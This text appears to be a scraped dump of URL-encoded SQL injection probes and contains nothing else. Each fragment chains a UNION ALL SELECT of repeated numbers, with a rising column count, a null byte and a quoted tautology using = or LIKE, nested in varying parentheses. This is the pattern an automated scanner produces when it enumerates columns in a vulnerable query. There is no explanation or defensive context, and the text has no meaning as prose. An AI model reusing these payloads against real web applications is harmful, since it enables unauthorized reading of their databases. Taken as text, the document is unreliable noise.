-3141%22%29%29%29%20UNION%20ALL%20SELECT%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%00%20AND%20%28%28%28%22jyer%22%3D%22jyer -5601%22%29%29%29%20UNION%20ALL%20SELECT%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%2C%209945%00%20AND%20%28%28%28%22xHio%22%3D%22xHio -5454%22%29%29%29%20UNION%20ALL%20SELECT%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%00%20AND%20%28%28%28%22bJsv%22%3D%22bJsv -5749%22%29%29%29%20UNION%20ALL%20SELECT%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%2C%201027%00%20AND%20%28%28%28%22juiQ%22%3D%22juiQ -8746%22%29%29%29%20UNION%20ALL%20SELECT%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%2C%205997%00%20AND%20%28%28%28%22MxOo%22%3D%22MxOo -3740%22%29%29%29%20UNION%20ALL%20SELECT%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%00%20AND%20%28%28%28%22YeKF%22%3D%22YeKF -1289%22%29%29%29%20UNION%20ALL%20SELECT%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%00%20AND%20%28%28%28%22NEqZ%22%3D%22NEqZ -2484%22%29%29%29%20UNION%20ALL%20SELECT%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%00%20AND%20%28%28%28%22MSLv%22%3D%22MSLv -7407%22%29%29%29%20UNION%20ALL%20SELECT%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%00%20AND%20%28%28%28%22XIvn%22%3D%22XIvn -3513%22%20UNION%20ALL%20SELECT%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%2C%207515%00%20AND%20%22hCnQ%22%3D%22hCnQ -7335%22%20UNION%20ALL%20SELECT%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%2C%201406%00%20AND%20%22NdQW%22%3D%22NdQW -8691%22%20UNION%20ALL%20SELECT%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%00%20AND%20%22HRQk%22%3D%22HRQk -8182%22%20UNION%20ALL%20SELECT%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%00%20AND%20%22WHcr%22%3D%22WHcr -5104%22%20UNION%20ALL%20SELECT%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%00%20AND%20%22vGYZ%22%3D%22vGYZ -5910%22%20UNION%20ALL%20SELECT%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%00%20AND%20%22aMMQ%22%3D%22aMMQ -2794%22%20UNION%20ALL%20SELECT%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%00%20AND%20%22xsAt%22%3D%22xsAt -3658%22%20UNION%20ALL%20SELECT%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%00%20AND%20%22qBFo%22%3D%22qBFo -2302%22%20UNION%20ALL%20SELECT%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%2C%204006%00%20AND%20%22Pzkp%22%3D%22Pzkp -2750%22%20UNION%20ALL%20SELECT%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%2C%204172%00%20AND%20%22UHnw%22%3D%22UHnw -6437%22%29%20UNION%20ALL%20SELECT%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%2C%209630%00%20AND%20%28%22TibM%22%20LIKE%20%22TibM -8561%22%29%20UNION%20ALL%20SELECT%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%2C%207822%00%20AND%20%28%22eHHY%22%20LIKE%20%22eHHY -8803%22%29%20UNION%20ALL%20SELECT%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%00%20AND%20%28%22pWQc%22%20LIKE%20%22pWQc -4840%22%29%20UNION%20ALL%20SELECT%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%00%20AND%20%28%22Jujj%22%20LIKE%20%22Jujj -8590%22%29%20UNION%20ALL%20SELECT%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%2C%203766%00%20AND%20%28%22FwYm%22%20LIKE%20%22FwYm -2785%22%29%20UNION%20ALL%20SELECT%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%2C%207897%00%20AND%20%28%22Shcs%22%20LIKE%20%22Shcs -5424%22%29%20UNION%20ALL%20SELECT%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%2C%209145%00%20AND%20%28%22VEOY%22%20LIKE%20%22VEOY -6958%22%29%20UNION%20ALL%20SELECT%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%00%20AND%20%28%22HHSq%22%20LIKE%20%22HHSq -1845%22%29%20UNION%20ALL%20SELECT%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%00%20AND%20%28%22SCGN%22%20LIKE%20%22SCGN -5344%22%29%20UNION%20ALL%20SELECT%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%2C%203482%00%20AND%20%28%22pPEe%22%20LIKE%20%22pPEe -6897%22%29%29%20UNION%20ALL%20SELECT%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%00%20AND%20%28%28%22Rhxa%22%20LIKE%20%22Rhxa -3767%22%29%29%20UNION%20ALL%20SELECT%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%00%20AND%20%28%28%22KWgq%22%20LIKE%20%22KWgq -7171%22%29%29%20UNION%20ALL%20SELECT%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%00%20AND%20%28%28%22Yhtk%22%20LIKE%20%22Yhtk -6331%22%29%29%20UNION%20ALL%20SELECT%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%00%20AND%20%28%28%22KNsA%22%20LIKE%20%22KNsA -9454%22%29%29%20UNION%20ALL%20SELECT%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%00%20AND%20%28%28%22HtQM%22%20LIKE%20%22HtQM -2468%22%29%29%20UNION%20ALL%20SELECT%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%2C%204369%00%20AND%20%28%28%22Ouuh%22%20LIKE%20%22Ouuh -1306%22%29%29%20UNION%20ALL%20SELECT%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%00%20AND%20%28%28%22XkVe%22%20LIKE%20%22XkVe -5487%22%29%29%20UNION%20ALL%20SELECT%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%00%20AND%20%28%28%22xrrP%22%20LIKE%20%22xrrP -1894%22%29%29%20UNION%20ALL%20SELECT%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%00%20AND%20%28%28%22ApRs%22%20LIKE%20%22ApRs -7898%22%29%29%20UNION%20ALL%20SELECT%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%2C%207253%00%20AND%20%28%28%22MdJY%22%20LIKE%20%22MdJY -2893%22%29%29%29%20UNION%20ALL%20SELECT%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%00%20AND%20%28%28%28%22QYxq%22%20LIKE%20%22QYxq -5443%22%29%29%29%20UNION%20ALL%20SELECT%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%00%20AND%20%28%28%28%22wUKA%22%20LIKE%20%22wUKA -7164%22%29%29%29%20UNION%20ALL%20SELECT%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%00%20AND%20%28%28%28%22JEpt%22%20LIKE%20%22JEpt -1022%22%29%29%29%20UNION%20ALL%20SELECT%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%2C%203913%00%20AND%20%28%28%28%22fybx%22%20LIKE%20%22fybx -9221%22%29%29%29%20UNION%20ALL%20SELECT%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%00%20AND%20%28%28%28%22fWlv%22%20LIKE%20%22fWlv -8827%22%29%29%29%20UNION%20ALL%20SELECT%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%00%20AND%20%28%28%28%22XrWx%22%20LIKE%20%22XrWx -7604%22%29%29%29%20UNION%20ALL%20SELECT%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%00%20AND%20%28%28%28%22ugUG%22%20LIKE%20%22ugUG -8283%22%29%29%29%20UNION%20ALL%20SELECT%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%00%20AND%20%28%28%28%22UkQg%22%20LIKE%20%22UkQg -1117%22%29%29%29%20UNION%20ALL%20SELECT%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%00%20AND%20%28%28%28%22qQiY%22%20LIKE%20%22qQiY -2157%22%29%29%29%20UNION%20ALL%20SELECT%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%00%20AND%20%28%28%28%22Zffb%22%20LIKE%20%22Zffb -8287%22%20UNION%20ALL%20SELECT%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%00%20AND%20%22JkNd%22%20LIKE%20%22JkNd -9970%22%20UNION%20ALL%20SELECT%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%00%20AND%20%22ilIA%22%20LIKE%20%22ilIA -3844%22%20UNION%20ALL%20SELECT%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%2C%203879%00%20AND%20%22mrlO%22%20LIKE%20%22mrlO -6254%22%20UNION%20ALL%20SELECT%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%00%20AND%20%22rmPZ%22%20LIKE%20%22rmPZ -6540%22%20UNION%20ALL%20SELECT%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%00%20AND%20%22BPeo%22%20LIKE%20%22BPeo -8340%22%20UNION%20ALL%20SELECT%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%00%20AND%20%22fBug%22%20LIKE%20%22fBug -5754%22%20UNION%20ALL%20SELECT%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%00%20AND%20%22ZOHZ%22%20LIKE%20%22ZOHZ 